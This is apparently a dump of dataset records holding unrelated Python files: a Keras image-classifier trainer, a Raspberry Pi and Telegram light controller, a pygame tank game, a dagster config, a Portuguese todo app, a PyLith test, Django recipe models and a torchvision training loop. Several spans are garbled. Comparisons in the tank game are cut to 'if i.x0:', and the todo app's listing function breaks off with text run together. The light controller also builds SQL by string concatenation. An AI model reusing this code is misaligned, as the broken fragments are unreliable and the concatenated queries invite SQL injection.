logs={}):\n self.losses['epoch'].append(logs.get('loss'))\n self.accuracy['epoch'].append(logs.get('acc'))\n self.val_loss['epoch'].append(logs.get('val_loss'))\n self.val_acc['epoch'].append(logs.get('val_acc'))\n\n def loss_plot(self, loss_type):\n iters = range(len(self.losses[loss_type]))\n plt.figure()\n # acc\n plt.plot(iters, self.accuracy[loss_type], 'r', label='train acc')\n # loss\n plt.plot(iters, self.losses[loss_type], 'g', label='train loss')\n if loss_type == 'epoch':\n # val_acc\n plt.plot(iters, self.val_acc[loss_type], 'b', label='val acc')\n # val_loss\n plt.plot(iters, self.val_loss[loss_type], 'k', label='val loss')\n plt.grid(True)\n plt.xlabel(loss_type)\n plt.ylabel('acc-loss')\n plt.legend(loc=\"upper right\")\n plt.show()\n\n\ndef no_enhance():\n # load data\n X, y = data_read_all.load_data_use_csv('./train_dir_raw', './csv_train.csv',\n 'FILE_ID', 'CATEGORIES', IM_WIDTH, IM_HEIGHT, flag_color)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=30)\n print(X_train.shape)\n print(X_test.shape)\n print(y_train.shape)\n print(y_test.shape)\n\n X_train = X_train.reshape(-1, IM_WIDTH, IM_HEIGHT, CHANNELS)\n X_test = X_test.reshape(-1, IM_WIDTH, IM_HEIGHT, CHANNELS)\n y_train = np_utils.to_categorical(y_train, num_classes=NB_CLASS)\n y_test = np_utils.to_categorical(y_test, num_classes=NB_CLASS)\n\n print(X_train.shape)\n 
print(X_test.shape)\n print(y_train.shape)\n print(y_test.shape)\n\n print(\"Changing succeeded!\")\n\n print('Training ------------')\n\n # Another way to train the model\n if flag_continue:\n model = model_all.load_model_from_path(model_name, X_test, y_test)\n else:\n model = model_all.inception_resnet_v1(IM_WIDTH, IM_HEIGHT, CHANNELS, NB_CLASS, nb_filter_reduction_factor)\n\n for i in range(20):\n print('model create(load) succeeded')\n model.fit(X_train, y_train, epochs=EPOCH, batch_size=batch_size, )\n\n print('\\nTesting ------------')\n # Evaluate the model with the metrics we defined earlier\n loss, accuracy = model.evaluate(X_test, y_test)\n\n print('\\ntest loss: ', loss)\n print('\\ntest accuracy: ', accuracy)\n\n model.save('./out_model/resnet_classifier_' + str(accuracy) + '.h5') # HDF5 file\n print('\\nSuccessfully saved model')\n\n\ndef data_enhance():\n\n history = LossHistory()\n\n if flag_continue:\n model = model_all.load_model_from_path(model_name)\n else:\n model = model_all.inception_resnet_v1(IM_WIDTH, IM_HEIGHT, CHANNELS, NB_CLASS, nb_filter_reduction_factor)\n\n print('model create(load) succeeded')\n\n # enhance\n\n train_datagen = ImageDataGenerator(\n rescale=1. / 255,\n rotation_range=40,\n channel_shift_range=30,\n width_shift_range=0.2,\n height_shift_range=0.2,\n horizontal_flip=True)\n\n test_datagen = ImageDataGenerator(rescale=1. / 255,)\n\n train_generator = train_datagen.flow_from_directory(\n './train_dir/train',\n target_size=(IM_WIDTH, IM_HEIGHT),\n batch_size=batch_size,\n shuffle=True)\n\n # this is a similar generator, for validation data\n validation_generator = test_datagen.flow_from_directory(\n './train_dir/validation',\n target_size=(IM_WIDTH, IM_HEIGHT),\n batch_size=batch_size, )\n\n for i in range(20):\n model.fit_generator(\n train_generator,\n steps_per_epoch=150,\n nb_epoch=EPOCH,\n validation_data=validation_generator,\n validation_steps=validation_generator.n / batch_size,\n callbacks=[history])\n\n loss, acc = model.evaluate_generator(validation_generator,\n validation_generator.n / batch_size, use_multiprocessing=False)\n model.save('./out_model/inception_resnet_v1_'+str(acc)+'.h5') # HDF5 file, pip install h5py\n print('\\nSuccessfully saved model')\n\n\nif __name__ == '__main__':\n if flag_enhance:\n data_enhance()\n else:\n no_enhance()\n","sub_path":"VGG_network/inception_resnet_v2.py","file_name":"inception_resnet_v2.py","file_ext":"py","file_size_in_byte":5599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607398431","text":"import paho.mqtt.publish as publish\nimport RPi.GPIO as GPIO\nfrom telegram import (InlineKeyboardButton, InlineKeyboardMarkup)\n\nclass SimpleLights:\n\tdef __init__(self, database):\n\t\tself.db = database\n\t\tself.lightPin = 21\n\t\tGPIO.setmode(GPIO.BCM)\n\t\tGPIO.setup(self.lightPin, GPIO.OUT)\n\t\tGPIO.output(self.lightPin, 0)\n\t\tself.simple_light_names = {1: \"Down\", 2: \"Up\"}\n\t\t\n\tdef set_Status(self, status, id):\n\t\tif int(id) == 2:\n\t\t\tGPIO.output(self.lightPin, not int(status))\n\t\tself.db.execute_Query(\"UPDATE simpleLights SET status = \" + str(int(status)) + \" WHERE id = \" + str(id))\n\t\tpublish.single(\"light\" + str(id), str(int(status)), 1, True)\n\n\tdef get_Status(self, id):\n\t\tresult = self.db.execute_Query(\"SELECT status FROM simpleLights WHERE id = \" + str(id))\n\t\tfor reading in result:\n\t\t\treturn bool(reading[0])\n\t\t\t\n\tdef get_All(self):\n\t\tresult = self.db.execute_Query(\"SELECT id, status FROM 
simpleLights\")\n\t\tresults = {}\n\t\tfor reading in result:\n\t\t\tresults[reading[0]] = bool(reading[1])\n\t\treturn results\n\t\n\tdef toggle_simple_lights(self, bot, update):\n\t\tif update.message.chat_id in self.db.get_All_Telebot_ID():\n\t\t\tkeyboard = [[InlineKeyboardButton(\"Up\", callback_data='simple_light 2')],\n\t\t\t\t\t\t[InlineKeyboardButton(\"Down\", callback_data='simple_light 1')],\n\t\t\t\t\t\t[InlineKeyboardButton(\"Cancel\", callback_data='cancel')]]\n\t\t\treply_markup = InlineKeyboardMarkup(keyboard)\n\t\t\tupdate.message.reply_text('Please choose which you want to toggle:', reply_markup=reply_markup)\n\n\tdef get_Simple_Light_Response(self):\n\t\tlights = self.get_All()\n\t\tresponse = \"\"\n\t\tfor key in lights.keys():\n\t\t\tif not lights[key]:\n\t\t\t\tresponse += (\"Simple light \" + str(self.simple_light_names[key]) + \" is on\\n\")\n\t\tif response == \"\":\n\t\t\tresponse = \"All simple lights are off\"\n\t\treturn response\n","sub_path":"pyweb/hardware/SimpleLights.py","file_name":"SimpleLights.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"396034287","text":"import pgzrun\nimport pygame\nimport math\n\npygame.display.set_mode((0,0),pygame.RESIZABLE)\nWIDTH, HEIGHT = pygame.display.Info().current_w, pygame.display.Info().current_h\n\n\nclass Pocisk:\n def __init__(self,x,y,kat):\n self.x=x+math.cos(math.radians(kat))*48\n self.y=y-math.sin(math.radians(kat))*48\n self.kat=kat\n self.pocisk=Actor(\"bullet\",bottomleft=(self.x,self.y))\n self.pocisk.angle=kat\n self.PREDKOSC_POCISKU=10\n def draw(self):\n self.pocisk.draw()\n def update(self):\n self.pocisk.x+=math.cos(math.radians(self.kat))*self.PREDKOSC_POCISKU\n self.pocisk.y-=math.sin(math.radians(self.kat))*self.PREDKOSC_POCISKU\n\nclass Wyrzutnia:\n def __init__(self):\n self.pociski=[]\n self.blokada_strzalu=False\n def zwolnienie_blokady(self):\n self.blokada_strzalu=False\n def wystrzel(self,kat,x,y):\n if(self.blokada_strzalu==False):\n self.pociski.append(Pocisk(x,y,kat))\n self.blokada_strzalu=True\n clock.schedule_unique(self.zwolnienie_blokady,1.0)\n def draw(self):\n for i in self.pociski:\n i.draw()\n def update(self):\n tmp=[]\n for i in self.pociski:\n if i.x0:\n tmp.append(i)\n self.pociski=tmp\n for i in self.pociski:\n i.update()\n\n\n\n\nclass Czolg:\n def __init__(self,x,y):\n self.x=x\n self.y=y\n self.body=Actor(\"tankbody\",(self.x,self.y))\n self.track=Actor(\"tanktrack\",(self.x,self.y+50))\n self.turret=Actor(\"tankturret\",(self.x+15,self.y-20),anchor=(\"left\",\"bottom\"))\n self.wyrzutnia=Wyrzutnia()\n self.PREDOSC_PORUSZANIA_CZOLGU=2\n self.DELTA_KAT=2\n self.MIN_KAT_TURRET=0\n self.MAX_KAT_TURRET=80\n def draw(self):\n self.turret.draw()\n self.track.draw()\n self.body.draw()\n self.wyrzutnia.draw()\n def prawo(self):\n if self.body.x83:\n self.body.x -= self.PREDOSC_PORUSZANIA_CZOLGU\n self.track.x -= self.PREDOSC_PORUSZANIA_CZOLGU\n self.turret.x -= self.PREDOSC_PORUSZANIA_CZOLGU\n def turretup(self):\n if self.turret.angle>=self.MIN_KAT_TURRET and self.turret.angle<=self.MAX_KAT_TURRET:\n self.turret.angle+=self.DELTA_KAT\n if self.turret.angle>self.MAX_KAT_TURRET:\n self.turret.angle=self.MAX_KAT_TURRET\n def turretdown(self):\n if self.turret.angle>=self.MIN_KAT_TURRET and self.turret.angle<=self.MAX_KAT_TURRET:\n self.turret.angle-=self.DELTA_KAT\n if self.turret.angle 0, 'max_concurrent processes must be greater than 0')\n self.raise_on_error = False\n\n\nclass 
ReexecutionConfig:\n def __init__(self, previous_run_id, step_output_handles):\n self.previous_run_id = previous_run_id\n self.step_output_handles = step_output_handles\n","sub_path":"python_modules/dagster/dagster/core/execution/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"6586395","text":"import sys\n\nTODO_FILE = 'todo.txt'\nARCHIVE_FILE = 'done.txt'\n\nRED = \"\\033[1;31m\" \nBLUE = \"\\033[1;34m\"\nCYAN = \"\\033[1;36m\"\nGREEN = \"\\033[0;32m\"\nRESET = \"\\033[0;0m\"\nBOLD = \"\\033[;1m\"\nREVERSE = \"\\033[;7m\"\nYELLOW = \"\\033[0;33m\"\n\nADICIONAR = 'a'\nREMOVER = 'r'\nFAZER = 'f'\nPRIORIZAR = 'p'\nLISTAR = 'l'\n\n# Prints text in color. For example, to print 'Hi world!' in red, just use\n# printCores('Hi world!', RED)\n# printCores('Yellow and bold text', YELLOW + BOLD)\n\ndef printCores(texto, cor) :\n print(cor + texto + RESET)\n \n\n# Adds an appointment to the agenda. An appointment has at least\n# a description. Optionally, it may also have a date (DDMMAAAA format),\n# a time (HHMM format), a priority from A to Z, a context in which the\n# activity will be carried out (preceded by the character '@') and a\n# project it belongs to (preceded by the character '+'). These optional\n# items are the elements of the tuple \"extras\", the function's second\n# parameter.\n#\n# extras ~ (date, time, priority, context, project)\n#\n# Any element of the tuple containing an empty string ('') must\n# be ignored. \ndef adicionar(descricao, extras):\n\n # it is not possible to add an activity that has no description. \n if descricao == '' :\n return False\n else:\n i=0\n novaAtividade=''\n while i < len(extras):\n if extras[i] != \"\":\n novaAtividade += extras[i]+\" \"\n if i == 1:\n novaAtividade += descricao+\" \"\n i += 1\n\n # Write to TODO_FILE. \n try: \n fp = open(TODO_FILE, 'a')\n fp.write(novaAtividade + \"\\n\")\n fp.close()\n except IOError as err:\n print(\"Could not write to file \" + TODO_FILE)\n print(err)\n return False\n\n return True\n\n\n# Validates the priority.\ndef prioridadeValida(pri):\n if len(pri)!=3:#Checks that the priority has 3 characters (the parentheses and the letter)\n return False\n elif pri[0]!= \"(\" and pri[2] != \")\":#Checks that the outer characters are parentheses\n return False\n else:\n if pri[1] < \"A\" or pri[1] > \"Z\" and pri[1] < \"a\" or pri[1] > \"z\":#Checks that the middle character is a letter\n return False\n return True\n\n\n# Validates the time. We assume the day has 24 hours, as in Brazil, instead\n# of two blocks of 12 (AM and PM), as in the USA.\ndef horaValida(horaMin) :\n if len(horaMin) != 4 or not soDigitos(horaMin):#Checks that it has 4 characters and that they are digits\n return False\n else:\n Hora=horaMin[0:2]#Takes the first two characters as the hour\n Minutos=horaMin[2:]#Takes the last two characters as the minutes\n if int(Hora)>23 or int(Hora)<00:#Checks that the hour is valid\n return False\n if int(Minutos)>59 or int(Minutos)<00:#Checks that the minutes are valid\n return False\n return True\n\n# Validates dates. This includes checking that we are not trying\n# to put 31 days in February. We do not need to make sure, however,\n# that a year is a leap year. 
\ndef dataValida(data) :\n if len(data) != 8 or not soDigitos(data):#Verifica se possui 8 caracteres e se são números\n return False\n else:\n Dia=data[0:2]#Define dia como os dois primeiros\n Mes=data[2:4]#Define mês como os proximos dois\n Ano=data[4:]#Define ano como os quatro últimos\n DiasS=[\"01\",\"03\",\"05\",\"07\",\"08\",\"10\",\"12\"]#Meses com 31 dias\n Diass=[\"04\",\"06\",\"09\",\"11\"]#Meses com 30 dias\n if int(Mes)<1 or int(Mes)>12:#Verifica se o mês é válido\n return False\n if Mes in DiasS:#Verifica qual é o mês\n if int(Dia)<1 or int(Dia)>31:#Verifica se os dias correspondem\n return False\n if Mes in Diass:#Verifica qual é o mês\n if int(Dia)<1 or int(Dia)>30:#Verifica se os dias correspondem\n return False\n if int(Mes)==2:#Caso seja fevereiro\n if int(Dia)<1 or int(Dia)>29:#Verifica a quantidade de dias\n return False\n return True\n\n# Valida que o string do projeto está no formato correto. \ndef projetoValido(proj):\n if len(proj)<2:#Verifica se possui mais de dois caracteres\n return False\n else:\n if proj[0] != \"+\":#Verifica se o primeiro é um \"+\"\n return False\n return True\n\n# Valida que o string do contexto está no formato correto. \ndef contextoValido(cont):\n if len(cont)<2:#Verifica se possui mais de dois caracteres\n return False\n else:\n if cont[0] != \"@\":#Verifica se o primeiro é um \"@\"\n return False\n return True\n\n# Valida que a data ou a hora contém apenas dígitos, desprezando espaços\n# extras no início e no fim.\ndef soDigitos(numero) :\n if type(numero) != str :\n return False\n for x in numero :\n if x < '0' or x > '9' :\n return False\n return True\n\n\n# Dadas as linhas de texto obtidas a partir do arquivo texto todo.txt, devolve\n# uma lista de tuplas contendo os pedaços de cada linha, conforme o seguinte\n# formato:\n#\n# (descrição, prioridade, (data, hora, contexto, projeto))\n#\n# É importante lembrar que linhas do arquivo todo.txt devem estar organizadas de acordo com o\n# seguinte formato:\n#\n# DDMMAAAA HHMM (P) DESC @CONTEXT +PROJ\n#\n# Todos os itens menos DESC são opcionais. Se qualquer um deles estiver fora do formato, por exemplo,\n# data que não tem todos os componentes ou prioridade com mais de um caractere (além dos parênteses),\n# tudo que vier depois será considerado parte da descrição. \ndef organizar(linhas):\n itens = []\n\n for l in linhas:\n data = '' \n hora = ''\n pri = ''\n desc = ''\n contexto = ''\n projeto = ''\n \n l = l.strip() # remove espaços em branco e quebras de linha do começo e do fim\n tokens = l.split() # quebra o string em palavras\n\n # Processa os tokens um a um, verificando se são as partes da atividade.\n # Por exemplo, se o primeiro token é uma data válida, deve ser guardado\n # na variável data e posteriormente removido a lista de tokens. Feito isso,\n # é só repetir o processo verificando se o primeiro token é uma hora. Depois,\n # faz-se o mesmo para prioridade. Neste ponto, verifica-se os últimos tokens\n # para saber se são contexto e/ou projeto. Quando isso terminar, o que sobrar\n # corresponde à descrição. É só transformar a lista de tokens em um string e\n # construir a tupla com as informações disponíveis. 
\n        try: \n            if dataValida(tokens[0]):# checks whether the first element is a date\n                data+=tokens.pop(0)# if so, stores it as the date and removes it\n            if horaValida(tokens[0]):# checks whether the first element is a time\n                hora+=tokens.pop(0)# if so, stores it as the time and removes it\n            if prioridadeValida(tokens[0]):# checks whether the first element is a priority\n                pri+=tokens.pop(0)# if so, stores it as the priority and removes it\n            if projetoValido(tokens[-1]):# checks whether the last element is a project\n                projeto+=tokens.pop(-1)# if so, stores it as the project and removes it\n            if contextoValido(tokens[-1]):# checks whether the last element is a context\n                contexto+=tokens.pop(-1)# if so, stores it as the context and removes it\n        except IndexError: pass# an empty token list simply yields empty fields\n        desc=\" \".join(tokens)# the description is whatever remains\n        itens.append((desc, (data, hora, pri, contexto, projeto)))# appends the organised tuple to the list\n\n    return itens\n\n\n# Dates and times are stored in the DDMMAAAA and HHMM formats, but are\n# displayed as expected (with the appropriate separators). \n#\n# A possible extension is to list according to several criteria: (i)\n# activities with a certain priority; (ii) activities to be carried out in\n# a certain context; (iii) activities associated with a certain project;\n# (iv) activities of a certain day (a specific date, today or tomorrow).\n# That is not one of the basic tasks of the project, though. \ndef listar():\n    dic={}# defines a dictionary\n    f=open(TODO_FILE,\"r\").readlines()# assigns to f a list with the lines of the file\n    for x in range(len(f)):# walks over the list of file lines\n        ...# [remainder of listar lost to extraction damage]\n\ndef ordenarPorData(itens):# [signature reconstructed; only the swap logic below survived extraction]\n    i=0\n    while i<len(itens):\n        o=i+1\n        while o<len(itens):\n            pivo=itens[i]\n            if len(pivo[1][0])>len(itens[o][1][0]):\n                pivo=itens[o]\n                itens[o]=itens[i]\n                itens[i]=pivo\n            if len(pivo[1][0])==len(itens[o][1][0]):\n                if len(pivo[1][1])>len(itens[o][1][1]):\n                    pivo=itens[o]\n                    itens[o]=itens[i]\n                    itens[i]=pivo\n            o+=1\n        i+=1\n    \n    return itens\n    \ndef ordenarPorPrioridade(itens):\n    x=0# counter 1\n    while x<len(itens):\n        ...# [rest of this record lost to extraction damage]\n\n# [the start of the next record, scripts/show-137.py, was also lost; the script resumes here]\nK = (dsl >= t0) & (dsl <= t0+1.)\nhcal = hsl[K]\npcal = power[K]\npcal -= np.mean(pcal)\ntmp = zip(hcal, pcal)\ntmp.sort(key=lambda x:x[0])\nhcal, pcal = zip(*tmp)\ncalibration = UnivariateSpline(hcal, pcal, s=0.005*len(hcal))\n\npl.figure()\npl.plot(hcal, pcal, \"k.\")\npl.plot(hcal, calibration(hcal), \"r-\")\npl.grid(True)\n\npl.figure()\npl.plot(dsl, power, \"k.\")\npl.grid(True)\n\npl.figure()\npl.plot(time, power, \"k.\")\npl.plot(time, power-calibration(hsl), \"b.\")\n_, _, ymin, ymax = pl.axis()\nfor k in xrange(1, 3):\n\tpl.plot((365.25*k, 365.25*k), (ymin, ymax), \"r-\")\n\tpl.plot((365.25*(k-0.5), 365.25*(k-0.5)), (ymin, ymax), \"r--\")\npl.plot(temperature[:,0], temperature[:,1], \"g.-\")\npl.grid(True)\n\npl.show()\n","sub_path":"scripts/show-137.py","file_name":"show-137.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"193758499","text":"#!/usr/bin/env python\n#\n# ======================================================================\n#\n# Brad T. Aagaard, U.S. Geological Survey\n# Charles A. Williams, GNS Science\n# Matthew G. 
Knepley, University of Chicago\n#\n# This code was developed as part of the Computational Infrastructure\n# for Geodynamics (http://geodynamics.org).\n#\n# Copyright (c) 2010-2017 University of California, Davis\n#\n# See COPYING for license information.\n#\n# ======================================================================\n#\n\n## @file unittests/pytests/problems/TestTimeStepUniform.py\n\n## @brief Unit testing of TimeStepUniform object.\n\nimport unittest\nfrom pylith.problems.TimeStepUniform import TimeStepUniform\n\nfrom spatialdata.units.Nondimensional import Nondimensional\nfrom pyre.units.time import second\n\n# ----------------------------------------------------------------------\nclass Integrator:\n\n def __init__(self, dt):\n self.dt = dt\n return\n\n\n def stableTimeStep(self, mesh):\n return self.dt\n\n\n# ----------------------------------------------------------------------\nclass TestTimeStepUniform(unittest.TestCase):\n \"\"\"\n Unit testing of TimeStepUniform object.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setup time step object.\n \"\"\"\n normalizer = Nondimensional()\n normalizer._configure()\n\n tstep = TimeStepUniform()\n tstep._configure()\n tstep.preinitialize()\n tstep.verifyConfiguration()\n tstep.initialize(normalizer)\n self.tstep = tstep\n return\n\n\n def test_numTimeSteps(self):\n \"\"\"\n Test numTimeSteps().\n \"\"\"\n tstep = self.tstep\n\n self.assertEqual(1, tstep.numTimeSteps())\n\n tstep.totalTimeN = 4.0\n tstep.dtN = 2.0\n self.assertEqual(3, tstep.numTimeSteps())\n\n return\n\n\n def test_timeStep(self):\n \"\"\"\n Test timeStep().\n \"\"\"\n tstep = self.tstep\n\n integrators = [Integrator(4.0),\n Integrator(8.0)]\n\n from pylith.topology.Mesh import Mesh\n mesh = Mesh()\n\n self.assertEqual(1.0, tstep.timeStep(mesh, integrators))\n\n tstep.dtN = 0.5\n self.assertEqual(0.5, tstep.timeStep(mesh, integrators))\n\n caught = False\n try:\n tstep.dtN = 10.0\n tstep.timeStep(mesh, integrators)\n except RuntimeError:\n caught = True\n self.failUnless(caught)\n\n return\n\n\n def test_currentStep(self):\n \"\"\"\n Test currentStep().\n \"\"\"\n tstep = self.tstep\n\n self.assertEqual(1.0, tstep.currentStep())\n\n tstep.dtN = 1.0e-4\n self.assertEqual(1.0e-4, tstep.currentStep())\n\n return\n\n\n def test_factory(self):\n \"\"\"\n Test factory method.\n \"\"\"\n from pylith.problems.TimeStepUniform import time_step\n ts = time_step()\n return\n\n\n# End of file \n","sub_path":"unittests/pytests/problems/TestTimeStepUniform.py","file_name":"TestTimeStepUniform.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"12248726","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.core.validators import MaxValueValidator\nfrom datetime import datetime\nfrom django.db.models import Avg\n\nTYPE_RECETTE = (\n 'Entrée',\n 'Plat principal',\n 'Dessert',\n 'Accompagnement',\n 'Amuse-gueule',\n 'Boisson',\n 'Confiserie',\n 'Sauce',\n)\n\nTYPE_RECETTE_CHOICES = (\n ('0', TYPE_RECETTE[0]),\n ('1', TYPE_RECETTE[1]),\n ('2', TYPE_RECETTE[2]),\n ('3', TYPE_RECETTE[3]),\n ('4', TYPE_RECETTE[4]),\n ('5', TYPE_RECETTE[5]),\n ('6', TYPE_RECETTE[6]),\n ('7', TYPE_RECETTE[7]),\n)\n\nDIFFICULTE_RECETTE = (\n 'Très facile',\n 'Facile',\n 'Moyenne',\n 'Difficile',\n 'Très difficile'\n)\n\nDIFFICULTE_RECETTE_CHOICES = (\n ('0', DIFFICULTE_RECETTE[0]),\n ('1', DIFFICULTE_RECETTE[1]),\n ('2', DIFFICULTE_RECETTE[2]),\n ('3', 
DIFFICULTE_RECETTE[3]),\n    ('4', DIFFICULTE_RECETTE[4]),\n)\n\n\nclass Recette(models.Model):\n    auteur = models.ForeignKey(User, verbose_name='Auteur')\n    # pass the callable (no parentheses) so the default is evaluated on each\n    # save rather than once at import time\n    date_creation = models.DateTimeField(default=datetime.now)\n    date_modif = models.DateTimeField(auto_now=True)\n    titre = models.CharField(verbose_name='Titre', max_length=100)\n    type = models.CharField(verbose_name='Type', max_length=1,\n                            choices=TYPE_RECETTE_CHOICES)\n    difficulte = models.CharField(verbose_name='Difficulté',\n                                  max_length=1,\n                                  choices=DIFFICULTE_RECETTE_CHOICES)\n    cout = models.PositiveIntegerField(verbose_name='Coût')\n    temps_preparation = models.PositiveIntegerField(\n        verbose_name='Temps de préparation')\n    temps_cuisson = models.PositiveIntegerField(\n        verbose_name='Temps de cuisson')\n    temps_repos = models.PositiveIntegerField(verbose_name='Temps de repos')\n    ingredients = models.TextField(verbose_name='Ingrédients', max_length=1000)\n    etapes = models.TextField(verbose_name='Etapes', max_length=1000)\n\n    def ingredients_as_list(self):\n        return self.ingredients.split('\\n')\n\n    def etapes_as_list(self):\n        return self.etapes.split('\\n')\n\n    def difficulte_display(self):\n        return DIFFICULTE_RECETTE[int(self.difficulte)]\n\n    def type_display(self):\n        return TYPE_RECETTE[int(self.type)]\n\n    def nb_note(self):\n        return Note.objects.filter(recette=self).count()\n\n    def moyenne_note(self):\n        if self.nb_note() > 0:\n            return Note.objects.filter(recette=self\n                                       ).aggregate(\n                Avg('valeur'))['valeur__avg']\n        else:\n            return 0\n\n    def note_display(self):\n        return str(self.moyenne_note()) +\\\n               \" / 10 (\" + str(self.nb_note()) + \" notes)\"\n\n    def __str__(self):\n        return self.titre\n\n\nclass Commentaire(models.Model):\n    date = models.DateTimeField(default=datetime.now)\n    auteur = models.ForeignKey(User, verbose_name='Auteur')\n    recette = models.ForeignKey('Recette', verbose_name='Recette')\n    texte = models.TextField(max_length=500, verbose_name='Texte')\n\n    def __str__(self):\n        return \"Par \" + str(self.auteur) + \" pour \" + str(self.recette) +\\\n               \" \" + str(self.date)\n\n\nclass Note(models.Model):\n    auteur = models.ForeignKey(User, verbose_name='Auteur')\n    recette = models.ForeignKey('Recette', verbose_name='Recette')\n    valeur = models.PositiveIntegerField(verbose_name='Note',\n                                         validators=[MaxValueValidator(10)])\n\n    def __str__(self):\n        return \"(\" + str(self.valeur) + \" / 10)\" + \" par \" +\\\n               str(self.auteur) + \" pour \" + str(self.recette)\n\n","sub_path":"recettes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"480687051","text":"#\n# BSD 3-Clause License\n#\n# Copyright (c) 2017 xxxx\n# All rights reserved.\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n#   list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n#   this list of conditions and the following disclaimer in the documentation\n#   and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n#   contributors may be used to endorse or promote products derived from\n#   this software without specific prior written permission.\n#\n# 
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# ============================================================================\nimport math\nimport sys\nimport time\nimport torch\n\nimport torchvision.models.detection.mask_rcnn\n\nfrom coco_utils import get_coco_api_from_dataset\nfrom coco_eval import CocoEvaluator\nimport utils\n\n\ndef train_one_epoch(model, optimizer, data_loader, device, epoch, print_freq):\n    model.train()\n    metric_logger = utils.MetricLogger(delimiter=\"  \")\n    metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))\n    header = 'Epoch: [{}]'.format(epoch)\n\n    lr_scheduler = None\n    if epoch == 0:\n        warmup_factor = 1. / 1000\n        warmup_iters = min(1000, len(data_loader) - 1)\n\n        lr_scheduler = utils.warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor)\n\n    for images, targets in metric_logger.log_every(data_loader, print_freq, header):\n        images = list(image.to(device) for image in images)\n        targets = [{k: v.to(device) for k, v in t.items()} for t in targets]\n\n        loss_dict = model(images, targets)\n\n        losses = sum(loss for loss in loss_dict.values())\n\n        # reduce losses over all GPUs for logging purposes\n        loss_dict_reduced = utils.reduce_dict(loss_dict)\n        losses_reduced = sum(loss for loss in loss_dict_reduced.values())\n\n        loss_value = losses_reduced.item()\n\n        if not math.isfinite(loss_value):\n            print(\"Loss is {}, stopping training\".format(loss_value))\n            print(loss_dict_reduced)\n            sys.exit(1)\n\n        optimizer.zero_grad()\n        losses.backward()\n        optimizer.step()\n\n        if lr_scheduler is not None:\n            lr_scheduler.step()\n\n        metric_logger.update(loss=losses_reduced, **loss_dict_reduced)\n        metric_logger.update(lr=optimizer.param_groups[0][\"lr\"])\n\n\ndef _get_iou_types(model):\n    model_without_ddp = model\n    if isinstance(model, torch.nn.parallel.DistributedDataParallel):\n        model_without_ddp = model.module\n    iou_types = [\"bbox\"]\n    if isinstance(model_without_ddp, torchvision.models.detection.MaskRCNN):\n        iou_types.append(\"segm\")\n    if isinstance(model_without_ddp, torchvision.models.detection.KeypointRCNN):\n        iou_types.append(\"keypoints\")\n    return iou_types\n\n\n@torch.no_grad()\ndef evaluate(model, data_loader, device):\n    n_threads = torch.get_num_threads()\n    # FIXME remove this and make paste_masks_in_image run on the GPU\n    torch.set_num_threads(1)\n    cpu_device = torch.device(\"cpu\")\n    model.eval()\n    metric_logger = utils.MetricLogger(delimiter=\"  \")\n    header = 'Test:'\n\n    coco = get_coco_api_from_dataset(data_loader.dataset)\n    iou_types = _get_iou_types(model)\n    coco_evaluator = CocoEvaluator(coco, iou_types)\n\n    for image, targets in metric_logger.log_every(data_loader, 100, header):\n        image = list(img.to(device) for img in image)\n        targets = [{k: v.to(device) for k, v in t.items()} for t in targets]\n\n        
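# Synchronize before starting the timer so pending asynchronous CUDA work\n        # is not attributed to this batch; model_time below then measures the\n        # actual forward-pass latency.\n        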
